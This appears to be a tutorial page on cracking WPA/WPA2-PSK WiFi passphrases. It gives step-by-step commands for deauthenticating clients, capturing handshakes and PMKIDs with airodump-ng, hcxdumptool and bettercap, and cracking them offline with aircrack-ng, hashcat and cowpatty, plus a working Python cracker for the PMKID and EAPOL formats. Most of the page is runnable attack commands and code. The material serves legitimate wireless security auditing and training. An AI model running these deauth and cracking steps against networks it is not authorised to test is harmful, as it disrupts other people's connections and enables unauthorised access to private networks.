WPA/WPA2 Cracking

Exploitation

WPA2-PSK is the most common home WiFi security. Attacks focus on capturing the 4-way handshake or PMKID and cracking it offline.

4-Way Handshake Capture

Step 1: Start capture on the target network.

01-start-capture.sh
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

Step 2: Deauthenticate a client to force reconnection.
-0: deauth attack, 5: number of deauths, -a: target AP BSSID, -c: target client MAC.

02-deauth.sh
bash
# In another terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Step 3: Wait for "WPA handshake: AA:BB:CC:DD:EE:FF" in airodump. Verify the handshake was captured.

03-verify.sh
bash
aircrack-ng handshake-01.cap

Step 4: Crack with a wordlist using aircrack-ng.

04-crack-cpu.sh
bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap

GPU cracking with Hashcat is much faster. First, convert the capture to hashcat format.

05-convert.sh
bash
# Option 1: aircrack-ng -j writes the older .hccapx format (hashcat mode 2500, now deprecated)
aircrack-ng -j handshake handshake-01.cap

# Option 2: hcxpcapngtool writes the current 22000 format (PMKID and EAPOL hashes in one file)
hcxpcapngtool -o handshake.hc22000 handshake-01.cap

Crack with hashcat using mode 22000 (WPA-PBKDF2-PMKID+EAPOL).

06-crack-gpu.sh
bash
hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt

Use rules for better coverage.

07-crack-rules.sh
bash
hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

PMKID Attack (Clientless)

PMKID Attack Overview: Published in 2018 by the hashcat team, this attack takes the PMKID from the RSN information element of the first EAPOL-Key message (M1), which the AP sends as soon as a station associates. No connected client, no deauth and no completed handshake are needed: send an association request to the AP and record its reply.

Why PMKID Works

The PMKID is calculated as: HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
The PMK itself is PBKDF2-HMAC-SHA1(PSK, SSID, 4096 iterations, 256 bits). Both MAC addresses and the SSID are in the capture, so every candidate passphrase can be tested offline: derive the PMK, compute the PMKID, compare with the captured value. The 4-way handshake is cracked the same way, except that the candidate PMK is expanded into the PTK and its KCK is checked against the MIC of the captured EAPOL frame.
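The derivation end to end, as an added example that is not part of the original page or of hashcat/hcxtools: it builds a WPA*01 (PMKID) and a WPA*02 (EAPOL M2) line in the 22000 format from a constructed capture and then runs the dictionary attack that hashcat performs on them. It covers both the 4-way handshake crack above and the PMKID formula here. The SSID, passphrase, nonces and EAPOL frame are made up for the example; the MACs are the ones used throughout this page.

```python
import hashlib
import hmac

MIC_OFF = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_psk(psk: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", psk.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def kck_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce) -> bytes:
    """KCK = first 16 bytes of the PTK; 802.11 PRF: HMAC-SHA1(PMK, label | 0x00 | B | i), i = 0 suffices."""
    b = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk, b"Pairwise key expansion\x00" + b + b"\x00", hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with the MIC field zeroed; algorithm chosen by Key Info."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    keyver = eapol[6] & 0x07          # key descriptor version = low 3 bits of Key Info
    if keyver == 1:                   # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if keyver == 2:                   # WPA2/CCMP: HMAC-SHA1-128
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {keyver} (3 = AES-128-CMAC)")


def build_m2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Constructed EAPOL-Key message 2 (EAPOL v2, type 3); Key Info 0x010a = pairwise | MIC | version 2."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def hc22000_lines(ssid, psk, mac_ap, mac_sta, anonce, snonce):
    """Produce a WPA*01 (PMKID) and a WPA*02 (EAPOL) line as hcxpcapngtool would from a capture."""
    pmk = pmk_from_psk(psk, ssid)
    essid = ssid.encode().hex()
    line01 = f"WPA*01*{pmkid(pmk, mac_ap, mac_sta).hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid}***"
    m2 = build_m2(snonce)                                 # MIC field still zero
    mic = eapol_mic(kck_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce), m2)
    # MESSAGEPAIR 00 = MIC from M2 with ANONCE from M1; the EAPOL field carries M2 with its MIC zeroed
    line02 = f"WPA*02*{mic.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid}*{anonce.hex()}*{m2.hex()}*00"
    return line01, line02


def crack(line: str, candidates):
    """Offline dictionary attack on one hc22000 line (the work hashcat -m 22000 does per candidate)."""
    f = line.split("*")
    mac_ap, mac_sta, ssid = bytes.fromhex(f[3]), bytes.fromhex(f[4]), bytes.fromhex(f[5]).decode()
    for psk in candidates:
        pmk = pmk_from_psk(psk, ssid)
        if f[1] == "01" and pmkid(pmk, mac_ap, mac_sta).hex() == f[2]:
            return psk
        if f[1] == "02":
            anonce, eapol = bytes.fromhex(f[6]), bytes.fromhex(f[7])
            snonce = eapol[17:49]                         # Key Nonce field of M2
            if eapol_mic(kck_from_pmk(pmk, mac_ap, mac_sta, anonce, snonce), eapol).hex() == f[2]:
                return psk
    return None


def make_sample_hashes():
    """Constructed sample: page's MACs, made-up SSID/nonces, passphrase 'password123'."""
    return hc22000_lines("MyWiFi", "password123", bytes.fromhex("aabbccddeeff"),
                         bytes.fromhex("ccddeeff0011"), hashlib.sha256(b"anonce").digest(),
                         hashlib.sha256(b"snonce").digest())


if __name__ == "__main__":
    wordlist = ["letmein", "MyWiFi2020", "password123"]   # constructed stand-in for rockyou.txt
    for hash_line in make_sample_hashes():
        print(hash_line[:40] + "...", "->", crack(hash_line, wordlist))
```

PBKDF2 with 4096 iterations is the whole cost of the attack: a GPU only wins because it runs that derivation for millions of candidates in parallel, which is also why the precomputed-PMK tables later on this page are tied to one SSID. The SNONCE is read out of the EAPOL frame itself, so a single M1/M2 pair is enough; a message pair from M3/M4 works the same way with the nonce roles swapped.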

Step 1: Capture PMKID with hcxdumptool (modern method).

08-pmkid-capture.sh
bash
# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools

# hcxdumptool switches the interface to monitor mode itself (no airmon-ng step);
# stop NetworkManager/wpa_supplicant first so nothing else holds wlan0.
# The options below are for hcxdumptool 6.2 and earlier; 6.3 rewrote the CLI
# (BPF-based filtering), so check hcxdumptool --help for your version.
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15

# Target specific networks (filtermode=2 treats the list as a whitelist)
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# targets.txt: one AP MAC per line, 12 hex digits without separators, optional comment after it:
# aabbccddeeff  # target AP
# 112233445566

Step 2: Extract PMKID and convert to hashcat format.

09-pmkid-extract.sh
bash
# Convert to hashcat 22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Check whether a PMKID was captured: type 01 lines are PMKIDs, type 02 lines are EAPOL handshakes
grep "^WPA\*01" pmkid.hc22000

# Line format: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***

Step 3: Crack PMKID with hashcat.

10-pmkid-crack.sh
bash
# Basic dictionary attack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

# With rules (best64)
hashcat -m 22000 pmkid.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack (8 digits)
hashcat -m 22000 pmkid.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# Hybrid attack (wordlist + digits)
hashcat -m 22000 pmkid.hc22000 -a 6 wordlist.txt ?d?d?d?d

# Show cracked passwords
hashcat -m 22000 pmkid.hc22000 --show

Alternative: Use Bettercap to trigger PMKID capture.

11-bettercap-pmkid.sh
bash
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.show

# Choose where captured PMKIDs/handshakes are written (set this before associating)
> set wifi.handshakes.file pmkid.pcap

# Send an association request to the target AP; its EAPOL M1 reply carries the PMKID
> wifi.assoc AA:BB:CC:DD:EE:FF

# Then convert for hashcat: hcxpcapngtool -o pmkid.hc22000 pmkid.pcap

Advanced Cracking Techniques

Combinator Attack: Combine two wordlists.

12-combinator.sh
bash
# Combine words from two lists
hashcat -m 22000 handshake.hc22000 -a 1 wordlist1.txt wordlist2.txt

# Example: "password" + "123" = "password123"

Precomputed PMK Tables: genpmk runs PBKDF2 once per word for a given SSID and stores the PMKs (commonly called rainbow tables, although they are plain lookup tables).

13-rainbow.sh
bash
# Precompute PMKs for one SSID
genpmk -f wordlist.txt -d rainbow.db -s "SSID_NAME"

# Use cowpatty with the precomputed table
cowpatty -d rainbow.db -r handshake-01.cap -s "SSID_NAME"

# Note: the SSID is the PBKDF2 salt, so a table only works for that exact SSID.
# Worth building for common defaults ("linksys", "default", "NETGEAR"), useless for unique SSIDs.

Incremental Mask Attack: Target specific password patterns.

14-mask-attacks.sh
bash
# Format: SSID + 4 digits (common for many routers)
hashcat -m 22000 handshake.hc22000 -a 3 MyWiFi?d?d?d?d

# Year patterns: four lowercase letters followed by 2020-2029
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l202?d

# Phone number patterns (XXX-XXXX)
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d-?d?d?d?d

# Custom charset (lowercase + numbers only)
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1

Distributed Cracking: Split the keyspace across multiple GPUs or cloud instances.

15-distributed.sh
bash
# First find the total keyspace (for -a 0 without rules this is the number of words)
hashcat -m 22000 handshake.hc22000 wordlist.txt --keyspace

# Instance 1: first 5,000,000 candidates
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=0 --limit=5000000

# Instance 2: everything from candidate 5,000,000 onwards
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=5000000

# Name the session when starting so it can be resumed if interrupted
hashcat -m 22000 handshake.hc22000 wordlist.txt --session=session1

# Resume: only --session and --restore, the original arguments are read from the restore file
hashcat --session=session1 --restore

⚠️ PMKID Limitations

  • Not every AP includes a PMKID in M1; some vendors removed it in firmware after the attack was published, so hcxdumptool gets nothing from those.
  • APs with roaming support (802.11r) and PMKSA caching are the most likely to send one.
  • If no PMKID shows up, fall back to the 4-way handshake capture above.
  • WPA3-SAE derives the PMK from the Dragonfly exchange rather than from PBKDF2 over the passphrase, so neither a PMKID nor a handshake gives an offline cracking path; on WPA3 transition-mode networks the WPA2 side is still attackable.